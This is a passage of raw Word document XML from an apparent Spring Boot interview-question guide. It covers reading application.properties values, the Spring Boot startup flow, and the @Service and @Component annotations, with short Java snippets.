        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="603" w:name="_Toc197867817"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to access application.properties properties in java code?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="603"/>
    </w:p>
    <w:p w14:paraId="55BCAA6B" w14:textId="2913A74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application.properties values in Java code in Spring Boot using any of the following methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E2A4A3"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3F766">
          <v:rect id="_x0000_i2527" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED2CBEB"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1. Using @Value Annotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E5D3E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76FE52F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15C129E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2E71D6B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6047FD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D901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Value("${app.name}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540FA5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appName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774CB3CD" w14:textId="77777777" w:rsidR="000068F0" w:rsidRPr="00D774B4" w:rsidRDefault="000068F0" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="549AC84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printAppName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5102B2C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lication Name: " + appName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9215D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25DFD1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C2C5D9"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B6C6BE">
          <v:rect id="_x0000_i2528" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2D1104"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2. Using @ConfigurationProperties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F291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for mapping multiple properties into a POJO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C8C8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59B7B43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77888D5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version=1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA274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F6034D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prefix = "app")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D8612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Properties {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20147D86"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4D203B7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version;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68974B5B" w14:textId="77777777" w:rsidR="000068F0" w:rsidRPr="00D774B4" w:rsidRDefault="000068F0" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F32C2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2950AD5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17A14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utowire this class wherever needed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0092E82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EDFEA7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AppProperties appProperties;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F32C51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333D4">
          <v:rect id="_x0000_i2529" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BF5A2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3. Using Environment Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF38AF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626E54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nvironment env;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D37D30A" w14:textId="77777777" w:rsidR="000068F0" w:rsidRPr="00D774B4" w:rsidRDefault="000068F0" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11A805D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printProperty() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F47A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ppName = env.getProperty("app.name");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0C23D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 Name: " + appName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC8CB4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52BFFAB"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5180676">
          <v:rect id="_x0000_i2530" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FC33E3"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3105"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="18B3DA74" w14:textId="77777777" w:rsidTr="000068F0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D5F7377"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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31DD7A91"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tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="79956B88" w14:textId="77777777" w:rsidTr="000068F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46D05C7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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4277661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single property</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="4B3CB216" w14:textId="77777777" w:rsidTr="000068F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="744B2A0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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0299396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grouped properties as POJO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D774B4" w:rsidRPr="00D774B4" w14:paraId="444521D3" w14:textId="77777777" w:rsidTr="000068F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7288C5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vironment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0404B94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dynamic/property-based logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52665B98" w14:textId="7C8C7CB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531" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="535B12CF" w14:textId="2A9A6545" w:rsidR="00BF0319" w:rsidRPr="00CE4B95" w:rsidRDefault="00BF0319">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="604" w:name="_Toc197867818"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Spring boot application? How does it work?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="604"/>
    </w:p>
    <w:p w14:paraId="5078B2A1" w14:textId="41AB305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Spring Boot application</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a stand-alone, production-grade Spring-based application with minimal configuration. It simplifies Spring app development by providing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4169A00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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2E239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web server (Tomcat/Jetty/Undertow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6117030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ndalone JAR deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADD35A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pinionated defaults</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23614F3F"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B731">
          <v:rect id="_x0000_i2532" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6729E11A"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does it work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAD8BA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ain Class with @SpringBootApplication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D313A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4A6D2C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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF0EA9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B649B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class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBF346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B4A5B09"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935FA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at @SpringBootApplication does:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> It is a combination of three annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C88AF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 – Marks class as source of bean definitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2687F9A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utoConfiguration – Enables Spring Boot’s auto-configuration mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49813FE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 – Scans for components, configurations, and services in the current package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7E532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081A1">
          <v:rect id="_x0000_i2533" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F48896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Application Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCD3CD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Application.run()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is invoked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A3016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Boot initializes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007ABB32"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pplicationContext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6C25A8"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server (if web app)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ED9C95"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 of beans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209D03E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cans and registers all @Component, @Service, @Controller, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AC886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oads properties from application.properties or application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFA4B3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rts the web server (if web application)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702518E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lication is ready to accept requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A387915"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19EB7B">
          <v:rect id="_x0000_i2534" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4389F285"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Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E29B4A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web.xml, pom.xml can be minimal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410355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external server deployment (uses embedded server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38049CA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duction-ready with metrics, health checks via Actuator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FB4D1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sy integration with JPA, Security, Kafka, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D29E3F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hort, Spring Boot hides boilerplate and lets developers focus on business logic with minimal setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFABFB1" w14:textId="6FFD744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535" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16893297" w14:textId="305CFBFD" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="605" w:name="_Toc197867819"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of @Service annotation in spring?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="605"/>
    </w:p>
    <w:p w14:paraId="25605D07" w14:textId="576A7AC5" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F2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annotation in Spring is used to mark a class as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>service provider</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>specialized form of @Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that indicates the class contains </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>business logic</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDDA5D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0B246">
          <v:rect id="_x0000_i2536" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3104B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Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198E12C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7A734EA1"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the class holds </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>service-layer logic</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (used between controller and repository layers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349C7DBC"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Helps in </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>separation of concerns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729069E3"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detection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> through component scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293B2C71"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40E3B">
          <v:rect id="_x0000_i2537" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E24B20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0CDD11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32DB3B7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1F8440F5" w14:textId="77777777" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F20" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FBCC7DA"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EmployeeName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784BCFA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 Doe";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6A5B9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E48778F"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D1FA2A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inject it in another class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AEFA1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30BD2B0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mployeeService employeeService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6427BFB9"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2CF5E">
          <v:rect id="_x0000_i2538" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F2FE70"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Internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C17ED8B"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A0C22">
          <v:rect id="_x0000_i2539" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="676C809E"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t xml:space="preserve"> @Service is used to annotate classes that contain the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>core business logic</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D74C893" w14:textId="7B50314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540" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1D64C8" w14:textId="47DFBCC7" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="606" w:name="_Toc197867820"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of @Component annotation in spring?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="606"/>
    </w:p>
    <w:p w14:paraId="2071B046" w14:textId="40DDB7FF"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omponent annotation in Spring is used to indicate that a class is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring-managed component (bean)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is the most </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>generic stereotype annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>superclass for</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> other annotations like @Service, @Repository, and @Controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4484407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67CC0A">
          <v:rect id="_x0000_i2541" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A95F8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Component:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC1CF0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candidate for component scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522F057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llows Spring to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>detect and register the bean automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F2B2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dependency injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the class where needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B4D366"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0B9386">
          <v:rect id="_x0000_i2542" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="191EC00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BB8B8E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89B89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tilityService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E7BA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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E338F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Component!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450C8A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D24BB3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2F3E5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nd you can inject it like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1077782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524872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tilityService utilityService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406693F4"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720C6">
          <v:rect id="_x0000_i2543" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A46C29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ere to use it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A327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Use @Component when the class </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>doesn't clearly fit</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
